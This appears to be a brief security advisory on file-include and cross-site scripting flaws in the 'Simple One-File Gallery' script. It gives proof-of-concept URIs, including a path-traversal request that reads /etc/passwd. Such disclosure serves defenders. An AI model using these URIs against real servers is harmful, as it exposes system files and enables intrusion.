Simple One-File Gallery Multiple Input Validation Vulnerabilities

Simple One-File Gallery Multiple Input Validation Vulnerabilities

An attacker can exploit a local file-include vulnerability through a browser. To exploit a cross-site scripting vulnerability, an attacker must entice an unsuspecting victim to follow a malicious URI.

The following proof-of-concept URIs are available:

http://www.example.com/gallery.php?f=../../../../../../../../../../../../etc/passwd

http://www.example.com/gallery.php?f=[xss]